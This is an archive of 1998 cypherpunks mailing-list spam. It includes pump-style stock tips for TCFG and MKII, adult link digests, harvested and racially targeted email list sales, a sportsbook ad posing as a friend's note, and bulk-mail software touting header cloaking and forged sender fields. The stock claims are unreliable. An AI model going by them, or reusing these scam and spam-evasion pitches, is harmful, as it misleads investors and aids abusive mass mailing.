>This  small  publicly  traded  company  "TCFG"  which  is  just
>3  years  old  is  through  various  sources  now  negotiating
>with  the  "Big  Boys"!
>
>"TCFG"  the  letters  to  look  for.....
>
>
>
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: concerned@aol.com
Date: Thu, 22 Oct 1998 05:16:39 -0700 (PDT)
Subject: Y2K...
Message-ID: <199810221216.FAA18413@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


                             10/22/98

Y2K  Solution...
8  Pine  Circle  Dr., Silicon  Valley, Calif.

OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts.

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for..... 




----------------------------------------------------------------
  
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED THU OCT 22 <stuffed@stuffed.net>
Date: Thu, 22 Oct 1998 22:58:51 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981022071000.4036.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ LORI'S ABSOLUTE SEX
+ EASY TO PLEASE LEWINSKI
+ ONLY EROTICA
+ XXXPOSE
+ GALLERY XXX
+ CENTERFOLD GIRLS
+ FANTASY HOUSEWIFE GANGBANG
+ PANTIES & LACE
+ DANIELLE'S DEN
+ XXX ASIAN SLUTS
+ BONUS PIC 1 -> http://www.stuffed.net/home/18872.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/10632.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/26595.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/28032.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/13712.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KSanchez498@msn.com
Date: Thu, 22 Oct 1998 13:21:38 -0700 (PDT)
To: Great@Scanning
Subject: WHAT DO YOU LOOK LIKE??? Send your pic through email.......
Message-ID: <0d35757192016a8UPIMSSMTPUSR01@email.msn.com>
MIME-Version: 1.0
Content-Type: text/plain



<HTML><BODY BGCOLOR="#ff80c0"><FONT  COLOR="#0000ff" SIZE=5 PTSIZE=16><B><U>Did you know that you can send a picture of yourself to your friends online and you don't even need to buy a scanner?<BR>
</FONT><FONT  SIZE=4 PTSIZE=12></U><BR>
</FONT><FONT  COLOR="#800040" SIZE=4 PTSIZE=12>>How many times have you been asked "what do you look like" while talking in a chat room?<BR>
<BR>
>Have you ever wished that you could send updated pictures to family or friends?<BR>
<BR>
>Did you ever just want to have a picture album on your computer?<BR>
</FONT><FONT  COLOR="#000000" SIZE=4 PTSIZE=12><BR>
>That's where we come in.  We will scan </FONT><FONT  COLOR="#ff0000" SIZE=4 PTSIZE=12><U>any</FONT><FONT  COLOR="#000000" SIZE=4 PTSIZE=12></U> picture or document and return it to you via E-mail, </FONT><FONT  COLOR="#ff0000" SIZE=4 PTSIZE=12>the same day received.</FONT><FONT  COLOR="#000000" SIZE=4 PTSIZE=12><BR>
<BR>
>All you need to do is send us whatever picture or document you want scanned through regular mail and we will scan it, E-mail it to you </FONT><FONT  COLOR="#ff0000" SIZE=4 PTSIZE=12>the same day</FONT><FONT  COLOR="#000000" SIZE=4 PTSIZE=12>, and send you back the original </FONT><FONT  COLOR="#ff0000" SIZE=4 PTSIZE=12>undamaged.</FONT><FONT  COLOR="#000000" SIZE=4 PTSIZE=12><BR>
<BR>
>The fee for this service is $5 for the first picture and $2 for every picture thereafter.  E-mail us to ask about special bulk rates.  Compare that price to overpriced stores like Kinko's that charge $10-15 to have only one picture scanned.  We even guarantee that if your scan gets damaged or lost (like if your computer were to crash), </FONT><FONT  COLOR="#ff0000" SIZE=4 PTSIZE=12>we will resend it to you at no additional charge</FONT><FONT  COLOR="#000000" SIZE=4 PTSIZE=12>.<BR>
<BR>
> Mail pictures or documents and cash, check or money order to<BR>
<BR>
</FONT><FONT  COLOR="#ff0080" SIZE=4 PTSIZE=12>The Lady Scanner<BR>
PO Box 92841<BR>
Long Beach, Ca 90809</FONT><FONT  COLOR="#000000" SIZE=4 PTSIZE=12><BR>
<BR>
</FONT><FONT  COLOR="#800040" SIZE=4 PTSIZE=12>>Don't forget to include your return address if you would like the picture or document returned to you, your e-mail address, and the picture or document......</FONT><FONT  COLOR="#000000" SIZE=4 PTSIZE=12><BR>
<BR>
>If you have questions or would like to be removed from this list please E-Mail </FONT><FONT  SIZE=5 PTSIZE=14>The Lady Scanner (Click Here) </FONT><FONT  SIZE=4 PTSIZE=12>for assistance.....</FONT><FONT  COLOR="#00ffff" SIZE=4 PTSIZE=12><BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
</B></HTML>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rir@atnet.at
Date: Thu, 22 Oct 1998 15:43:03 -0700 (PDT)
To: rir@atnet.at
Subject: RELEASED 10/15/98!  VOL. 2
Message-ID: <011328705550122442@ls_flancygerm.com>
MIME-Version: 1.0
Content-Type: text/plain



PRESS RELEASE 10/15/98
INTRODUCING...THE CD VOL. 2   

The CD - Vol. 2, is the absolute best product of its' kind anywhere 
in the world today.  There are no other products anywhere that can 
compete with the quality of this product.

We took a total of over 190 million email addresses from many of the
touted CD's that are out there (bought them all - some were $300+)!
We added the millions we had in storage to those.   When we
combined them all, we had in excess of 300+ million addresses
in one huge file.

We  ran a super "sort/de-dupe" program against this huge list. It 
cut the file down to less than 20 million!!! Can you believe that? It 
seems that most people that are selling CD's are duping the public by 
putting numerous files of addresses in the CD over and over. This 
created many duplicate addresses. They also had many program "generated" 
email addresses like CompuServe, MCI, ANON's, etc.  This causes a 
tremendous amount of undeliverables.

After completion of removal of duplicates and initial filtering we were 
left with the base of 10 Million addresses worth fine tuning to finish the 
project.  Remember, we are not here to produce the CD with the gad zillion 
millions that our competitors are so proud to put their names on these days.  
We ARE here to produce the very BEST CD list as far as quality of 
addresses go

We then ran a program that contained 300+ keywords to remove addresses
with vulgarity,  profanity, sex-related names, postmaster, webmaster, flamer, 
abuse, spam, etc., etc.   Also eliminated all .EDU, mil, .org, .GOV, Genie, 
Delphi, GNN, Wow etc.   We also filtered out all addresses found in any of 
our 1300+ domains list.  We also filtered out addresses in excess of 30,000 
which have proven to be affiliated with anyone found to be opposed to our 
using direct bulk email as a advertising medium. We have also purged the 
list to be free of any "web poison" addresses created by those who are opposed 
to us conducting legitimate business on the internet today.  If you do not know 
what web poisoned addresses are, please look it up now.  One list we recently 
purchased had over 90% poisoned addresses.  The "bottom line" here is that 
you can go out on the world market today and purchase every lists for thousands 
of dollars and NOT have anymore worth owning than what we have compiled 
for you here today.

You use these addresses, you will experience increased response, increased 
sales, and a host of other positives that far exceeds any hoped for results when 
using the competitor's inferior products.  Our customers purchase our products 
over and over and over.  Most of the competition ever succeeds is selling a 
second product to anyone after they purchase the first.

  So, you see, our list will save people hundreds of dollars buying all others that are 
out there on  CD and otherwise. Using ours will be like using the 200+ million that 
we started with, but a lot less money and a lot less time!!
 
We have always said, "You can buy from the REST or you can buy from the BEST".   
Your choice.

                     _____________________________

                       What others are saying:

"I received the CD on Friday evening.   Like a kid with a new toy, I
 immediately started bulking out using the new email addresses.  Over
 the course of the weekend, I emailed out over 500,000 emails and I
 received less than TWENTY undeliverables!!  I am totally satisfied
with my purchase!!  Thanks Premier!!"
                              Dave Buckley
                              Houston,  TX
 
 "This list is worth it's weight in gold!!  I sent out 100,000 emails for my
 product and received over 55 orders!
                               Ann Colby
                            New Orleans, LA
 
                ****************************************
 
                                 HERE'S THE BOTTOM LINE
 
The CD is comprised of 7 million PREMIUM & SUPER clean addresses -ready 
for mailing upon receipt of the CD.  Each file contains exactly 100,000 email 
addresses. There are only AOL & Mixed addresses on this CD.  You have 50 files 
of 100,000 each of AOL to equal 5,000,000 addresses.  The AOL addresses are less 
than 6 weeks old and have been collected throughout the production schedule.
 
The remaining files are comprised of General Internet addresses. There are 20 files 
of 100,000 each, totaling 2,000,000 premium addresses.   NO Compuserve!  No Delphi!
No Genie!  No Prodigy!  NO Filler Addresses!  Simply the Best of the Best!!!

 
                           >>> ONLY $200.00!
 
This price is effective for the next seven days, thereafter the price will be
$299.00 so ORDER NOW!  Remember, bottom-line you always get what you pay for!

All lists are completely free of any Duplicates. We also on a continual basis, add 
New Names and Remove Undeliverables and Remove Requests. The result is the 
Cleanest Email Addresses Available Anywhere to use over and over again, for a 
FRACTION of the cost that other companies charge. Typical rates for acquiring 
email lists are from 1cent to as high as 3 cents per email  address - that's  
"INFORMATION HIGHWAY" ROBBERY!.

We continually work on our CD.  Who knows when those other CDs were made. 
We're constantly adding and deleting addresses, removes. Etc.  It all comes back 
to quality.

Don't even hesitate on this one or you will miss out on the most effective way to 
market anywhere...PERIOD!  If you have any further questions or to place an order, 
you can call toll free at:

800-600-0343  Ext. 2693


To order our email package, simply print out the EZ ORDER FORM
below and fax or mail it to our office today.
 
We accept Visa, Mastercard, AMEX, Checks by Fax.
 
 _________________
EZ Order Form
 

 _____Yes! I would like to order MILLIONS Vol. 2  email addresses
for only $200.00.
 
*Please select one of the following for shipping..
 
____I would like to receive my package OVERNIGHT. I'm including
$15 for shipping. (outside US add an additional $25 for shipping)
 
____I would like to receive my package 2 DAY delivery. I'm including
$10 for shipping.  (outside US add an additional $25 for shipping)
 
DATE_____________________________________________________
 
NAME____________________________________________________

COMPANY NAME___________________________________________

ADDRESS_________________________________________________

CITY, STATE, ZIP___________________________________________
 
PHONE NUMBERS__________________________________________
 
FAX NUMBERS_____________________________________________
 
EMAIL ADDRESS___________________________________________
 
TYPE OF CREDIT CARD:
 
______VISA _____MASTERCARD
 
CREDIT CARD# __________________________________________
 
EXPIRATION DATE________________________________________
 
NAME ON CARD___________________________________________
 
AMOUNT $____________________
 
 
(Required) SIGNATURE:x________________________
 
DATE:x__________________
 
You may fax your order to us at:   1-212-504-8192
 

CHECK BY FAX SERVICES!
 
If you would like to fax a check, paste your check below and fax it to
our office along with all forms to: 1-212-504-8192

******************************************************

***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 
CHECK HERE AND FAX IT TO US AT 1-212-504-8192
 
*******************************************************
 
If You fax a check, there is no need for you to send the original check.
We will draft up a new check, with the exact information from your
original check. All checks will be held for bank clearance.  (7-10 days)
Make payable to: "GD Publishing"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED FRI OCT 23 <stuffed@stuffed.net>
Date: Fri, 23 Oct 1998 10:27:02 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981023071001.26004.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ SWEBABES
+ FREE PORN 4 ALL
+ OUTRACK STEAKHOUSE
+ EBONYPORN
+ BABE ACCESS
+ FREE HARDCORE PORN
+ EACH STROKE COUNTS
+ AFTER DARK CLUB
+ PORN PRINCE
+ ULTRA FREE XXX
+ BONUS PIC 1 -> http://www.stuffed.net/home/13486.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/21866.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/7963.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/9787.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/9974.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "The BSB Publishing Comp." <043276@webmail.bellsouth.net>
Date: Fri, 23 Oct 1998 10:37:03 -0700 (PDT)
To: <cynnalil@aol.com>
Subject: Offering 50,000 African American Email Addresses . .
Message-ID: <199810231710.NAA00348@websmtp1.bellsouth.bigfoot.com>
MIME-Version: 1.0
Content-Type: text/plain


Email up to 50,000 African-American Consumers

CALL TOLL FREE TO ORDER - (800)305-1458

Also . . . Email 4,000 Black business owners and entrepreneurs
simultaneously. Generate web traffic and sales by exchanging links and
banners with other African- American Entrepreneurs.

Do you have a product or service of interest to African-Americans on the Internet?
Would you like to effortlessly expand your customer base by up to
50,000 African-Americans for under $100? If you answered yes to either
of these questions, then our email marketing lists are what you need.

We have a database of well over 50,000 email addresses of
African-Americans who may be interested in your products and services.
We also offer a email list of 4,000 African American entreprenuers and
businesses who do business on the internet. These contacts could lead
to a mutually profitible business relationship including banner and
link exchanges.

These pre-screened email addresses are compiled on 3.5" diskettes in
standard "DBASE IV" and "TEXT" format which are universally compatible
with email merge programs like CyberMailer Pro and word processing
programs. All you need to do is import the list into an email merge
program which will automatically email everyone on the list. It
couldn't be easier or more efficient.

Email up to 50,000 African-Americans immediately!

50,000 AA Email Addresses -   $99.95
10,000 AA Email Addresses -   $49.95
4,000  AA Entreprenuers   -   $39.95

***Special Limited time offer***
Order 50,000 African American Email Addresses and receive 4,000
African American Entreprenuers for FREE. ($39.95 value)

CALL TOLL FREE TO ORDER - (800)305-1458

BSB Publishing Co.
151 First Avenue - #225
New York, NY 10003

All orders are shipped C.O.D.
$10.00 - Priority Mail Shipping
$12.00 - Overnight Shipping





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED SAT OCT 24 <stuffed@stuffed.net>
Date: Sat, 24 Oct 1998 07:57:39 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981024071000.27469.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ INTIMATE PLEASURE
+ LESBIAN LIGHTNING
+ PINK PUSSY PICS
+ GRANNY SLUTS
+ JUST BLONDES NAKED
+ FINGER LICKIN' GOOD FREE PUSS
+ XXX CUM SLUTS
+ PORN WAVE
+ HOT BABES
+ THERE'S SOMETHING IN MARY
+ BONUS PIC 1 -> http://www.stuffed.net/home/8100.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/332.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/22099.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/24310.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/6236.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 46224097@compwebtech.com
Date: Sat, 24 Oct 1998 21:55:27 -0700 (PDT)
To: 123458@qqeioweisssiiie.com
Subject: Advertisement $99 Web Hosting
Message-ID: <199234233019.GAA08423@qqeioqeisssiiie.com>
MIME-Version: 1.0
Content-Type: text/plain


Check it out! 25 megs for only $99 per year with no set up fees. Free registration or change of domain at: www.compwebtech.com

If you would like to be removed from our mailing list, please e-mail us to have yourself removed for the list.  

Thank You,

Larry@compwebtech.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joy66@msn.com
Date: Sat, 24 Oct 1998 21:40:56 -0700 (PDT)
To: joy66@msn.com
Subject: 3 Bet on your favorite NFL team!! 3
Message-ID: <199810243231CAA37474@Copmunet.stcum.qc.ca>
MIME-Version: 1.0
Content-Type: text/plain


Don, Ted:

I guess I owe you guys lunch. Who would have thought
the Vikings would beat Green Bay!!  Aaarghh!

Since you guys are so clever when it comes to picking
winners maybe you should put some money on the
line for Sunday's games!

I found a great new casino and sportsbook!!
Check it out!

Click Here

You can bet on college and NFL games at their
sportsbook or play blackjack, poker, craps, 
slots or baccarat in the casino.

Guys, its AWESOME. There's no software
to download and you can place your bets
by telephone OR over the Internet!!

Try it out. You can set yourself up on-line at:
http://www.rosieschalkisland.com

Dan

P.S. Call me crazy guys, but I actually bet on the
Vikings and made over $ 120.00 Thanks for the tip!!
Remember...                                               
http://www.rosieschalkisland.com

*****************************************                   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED SUN OCT 25 <stuffed@stuffed.net>
Date: Sun, 25 Oct 1998 02:42:58 -0800 (PST)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981025071001.6878.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ SNATCH LAND
+ ONLY EROTICA
+ PLAYSX
+ SEX HAPPY
+ MASTURB8
+ WHORES INC
+ MEGA THUMBNAILS
+ PASSION'S FREE PORN
+ FREE XXX PICTURES
+ HENTAI BIJUTU
+ BONUS PIC 1 -> http://www.stuffed.net/home/2714.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/11566.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/3467.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/6065.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/2497.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: helloaol.com@mars.cableol.net
Date: Mon, 26 Oct 1998 00:10:47 -0800 (PST)
To: norisk100@mars.cableol.net
Subject: Limited time offer!!!!
Message-ID: <199809011934.MAA11742@www20000.net>
MIME-Version: 1.0
Content-Type: text/plain


ADVERTISE TO OVER 100 MILLION PEOPLE FOR FREE!!! 

NOW YOU CAN ADVERTISE FREE AND GET DRAMATICALLY
MORE RESPONSES THAN ADVERTISING ON NATIONAL TELEVISION 

With E-mail your potential customer is forced to read at least the
headline of your letter.  Unlike TV, magazines, newspaper ads, and 
direct mail where more than 99.99% of the recipients will skip right
over your  advertisement. 


TURNS YOUR COMPUTER INTO A CASH REGISTER:  Conservative estimates indicate 
well over 100 MILLION people will have E-mail accounts in the next year!   
E-Mail  Platinum, turns your computer into a cash register by giving you 
FREE, immediate access to all of them. Do you think some of the more than 100 
million people with E-mail addresses would be interested in your products or 
services?  Even if you don't have your own products or services you can 
still make money buy promoting our computer software!!!
You can make money with our new software called E-MAIL PLATINUM

Here's how:
* By Using E-Mail To Sell Your Products & Services
* By Using E-Mail To Sell our Computer Software such as: Email Platinum, 
  Web Walker, Email Lock Box etc.
* By Renting or Selling Your E-mail Addresses  
* By Becoming A Distributor for E-Mail  Platinum  


MUCH FASTER:  With bulk E-mail you get responses back in 1 to 4 
days instead of waiting weeks or months like with television or print 
advertising. You can begin filling orders the same day you send E-mail.  


FREE ADVERTISING WORTH MILLIONS:  It costs millions of dollars to mail out 
millions of letters using the United States Postal Service!  Now you can 
send your ad to MILLIONS of people for FREE using E-Mail Platinum


E-MAIL PLATINUM IS ACTUALLY 4 PROGRAMS IN 1:  E-Mail Platinum is amazing new 
technology and the most advanced bulk E-mail software on the market today.   
(1) E-Mail Platinum automatically extracts E-mail addresses from America 
Online, Compuserve, Prodigy, and the other online services, the Internet, 
web pages, news groups, and hundreds of other sources.   (2) E-Mail Platinum
automatically stores the E-mail addresses in your computer along with 
keywords that describe hobbies and interests to created highly targeted 
E-mail addresses.   (3) E-Mail Platinum sends your marketing letter or ad to 
MILLIONS of targeted E-mail addresses at the push of a single button!  (4)
E-Mail Platinum cloaks the headers in your Email Message!!

EMAIL  PLATINUM V3.1 New Features: 

1. Personalize every email you send. Email Platinum will gather the name of 
the users in addition to the email address. For example: Your message will 
start with Dear John.

This feature will create more response to your email which in return means 
dollars in your pocket!

2. EMAIL PLATINUM will Gather 3 times faster than the orignal.
 Now you can gather thousands of email addresses in minutes rather than hours!!!

3. Randomizes your "from" field. EMAIL PLATINUM will randomize your "from" email
 address automatically to stop flamers from bombing your email box.

4. BCC's - EMAIL PLATINUM allows you to check to make sure your mail is getting 
through your mail servers. This feature will save you time and money!!! 
If your mail in NOT getting to the receipents you will lose potential business 
and waist your valuable time. Now with our new feature you will be able to 
verify every batch of email that is sent.

5. Assign a New POP account: EMAIL PLATINUM allows you to disconnect and 
reconnect automatically to your mail server every 100-1000 emails sent. This 
will insure that you have a steady connection while your sending email. 


HOW DOES E-MAIL Platinum WORK?  E-Mail Platinum has dozens of special filters 
to automatically harvest E-mail addresses from major online services such as: 
America OnLine, Compuserve,Delphi, Genie, and of course the internet.  

AOL AUTO EXTRACTOR:  E-Mail Platinum has many special features like the AOL 
Auto Extractor that let's you use a regular dial-up Internet connection to 
collect names and addresses from America Online. Collect America Online
addresses without being a member.  Allows you to download names and addresses
from America Online without paying membership fees or online charges. Auto 
Extractor for all of the online services and Special E-mail database search 
engines will also be available at no additional charge.

SIMPLE TO USE:  E-Mail Platinum does all the work for you.  Unlike other 
programs where you must cut & paste addresses, E-Mail Platinum does it for you 
automatically. And, unlike other E-mail programs, with E-Mail Platinum there 
is no need to purchase any additional software

SPEED:  Your time is important.  E-MAIL Platinum is DRAMATICALLY FASTER at 
extracting and sending E-mails than all the other programs on the market 
that we tested it against.

NO SPECIAL EQUIPMENT NEEDED: E-Mail Platinumr runs on a PC with Windows
3.xx Windows 95, Windows NT, a 386 or faster processor, 4 MB RAM, and a 
hard drive with at least 10 MB free and your own SLIP or PPP connetion
(almost any internet provider is all  that is needed)  No other software needed.
 Also runs on a Macintosh with SoftWindows installed.


******************************************************************
Send  YOUR  message like this one, using E-Mail Platinum.

E-Mail Platinum is The World's Leading Bulk E-mail software.
With E-Mail Platinum you can advertise to over 100 million people for FREE!

Cost:

 We are giving away Email Platinum FOR FREE, your only cost is $139.90 
For 25 Million and growing Email Addresses,  downloadable, and updated frequently 
from our web site, (A 395.00 Value all by itself)!

 You Must order before 11/15/98 ,  And Email Platinum is yours,  Absolutely FREE!!!!!!

THAT'S IT!!! 

Our company is in the software business of developing cutting edge products, so 
we know if you have the opportunity to use our software FREE you will be our future
customers.  We know we need you to make our software business a true success!
**************************************************************************************************************
We take Checks via Telephone, Fax , Email, or Snail Mail !!

If you would like to order , and take advantage of this opportunity, !! 
                                                                                                             
                                         Call us at,  760 779-0231

  Or just paste your check to this offer and fax to, 760-779-9571
                                                          
            PLEASE INCLUDE YOUR EMAIL ADDRESS WITH ORDER!!

You  will Receive 25 million downloadable "and updated Frequently"
addresses,(in easy to manage lists of 100,000 each) 

Plus FREE Email PLATINUM SOFTWARE to all orders prior to 11/15/98 

        Free Electronic Help!                             Free Tech Support by Phone!
 


                                







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stockmarketupdate3kh23gkj@sprint.com
Date: Mon, 26 Oct 1998 00:27:47 -0800 (PST)
To: <shasreh@aol.com>
Subject: RE: URGENT BUY ALTER!
Message-ID: <00775282280626346@newyorknet.net>
MIME-Version: 1.0
Content-Type: text/plain


Company:  Mark I Industries
Symbol:   M K I I   (mkii)
Price:    1/2  ($.50/share)

M K I I  has announced an affiliation with one of 
their subsidiaries and AT&T.  Management projects
a $100 million revenue goal at their current rate
of growth with "the company's stock to trade in
the $4 range".

M K I I is rated an immediate and "STRONG BUY".
For more information on  M K I I go to:
http://quote.yahoo.com






...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED MON OCT 26 <stuffed@stuffed.net>
Date: Mon, 26 Oct 1998 01:57:33 -0800 (PST)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981026081000.29815.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ THE FINEST SEX ON THE NET
+ HEAVY HANGERS
+ RAM AWAY
+ HIGH RENT
+ TALENT SEARCH
+ FREE XXX SMUT
+ KANDY'S LAND
+ MADAME XXX
+ RAW SEX STORIES
+ DIGITAL FANTASY
+ BONUS PIC 1 -> http://www.stuffed.net/home/29871.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/9615.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/14096.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/10271.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/10892.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED TUE OCT 27 <stuffed@stuffed.net>
Date: Tue, 27 Oct 1998 09:17:00 -0800 (PST)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981027081000.8504.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ 3 XXX SLUT TOURS
+ SASHA'S DIRTY PIX
+ VIRTUAL SEX MACHINE
+ COUNTRY GIRLS
+ GALLERY XXX
+ WANKER ZONE
+ BUSTY BABES
+ INTIMATE PLEASURE
+ TABBY'S HOT BUFFET
+ BOOBLAND
+ BONUS PIC 1 -> http://www.stuffed.net/home/24485.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/20849.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/28232.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/24794.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/7153.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StoneCold-PT <pouttarac@yahoo.com>
Date: Tue, 27 Oct 1998 11:04:56 -0800 (PST)
To: Chip Mefford <nobody@replay.com>
Subject: unsubcribe
Message-ID: <19981027190410.17793.rocketmail@send1d.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain


unsubcribe




---Chip Mefford <cmefford@video.avwashington.com> wrote:
>
> 
> 
> Where possible, 
> 
> fuk a bunch of airlines anyway.
> 
> Travel by train is a lot more enjoyable, relaxing, fun.
> Folks that travel by train could fly, but would
> preferr to enjoy the ride, cause it ain't no cheaper, 
> 
> except, !!
> 
> you can pay with cash and show no id and go
> where you would like in the lower 48.
> 
> anonymously.
> 
> On Tue, 27 Oct 1998, Anonymous wrote:
> 
> > At 02:43 PM 10/26/98 -0400, Robert A. Costner wrote:
